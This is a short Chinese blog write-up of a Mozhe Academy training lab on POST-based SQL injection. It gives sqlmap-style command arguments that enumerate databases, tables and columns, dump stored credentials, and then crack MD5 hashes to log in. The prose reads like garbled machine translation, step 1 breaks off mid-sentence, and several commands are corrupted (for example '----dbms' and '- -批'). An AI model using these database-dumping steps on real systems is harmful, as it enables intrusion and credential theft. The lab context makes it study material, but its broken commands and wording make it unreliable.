墨者学院-SQL注入漏洞测试(POST)

 2024-03-01 05:04:12  阅读 0

测试环境为Kali Linux

1.因为我打开了“SQL注入漏洞测试(POST)”射击场,所以我首先点击进去,看到了一个登录界面。 然后仔细一探,发现主要问题出在登录上,于是我使用了

2、因为这个靶场的主要目的是后期测试,所以直接进入正题,打开它,开始后期抓包,将所有内容复制到kali机器的.txt文件中。 值得注意的是,这些内容不宜保存太久,否则会失效。 ,然后失败后重试。

3、在kali终端,使用攻击:先找到数据库“-r post.txt(这个文本文件就是刚才抓包的内容) --level 5 --risk 3 --dbs --dbms mysql - 批”

4、找到数据库中的表“-r post.txt --level 5 --risk 3 -D数据库名称--batch”

5、查找数据库表中的字段“-r post.txt --level 5 --risk 3 -D数据库名-T数据表名----dbms mysql --batch”

6、找到字段内容》-r post.txt --level 5 --risk 3 -D 数据库名-T 数据表名-C(字段1,字段2,....) --dump --dbms mysql - -批”

找到登录名和密码后,我们可以看到这是一个加密的密码,所以我们需要使用解密工具——MD5。 推荐使用该网页。

7. 分别解锁两个密码。 只能使用其中之一。 登录后,您将找到Key。 最后返回提交页面,提交Key。 这样就完成了射击场的测试。

标签: 字段 失效 漏洞

如本站内容信息有侵犯到您的权益请联系我们删除,谢谢!!


Copyright © 2020 All Rights Reserved 京ICP5741267-1号 统计代码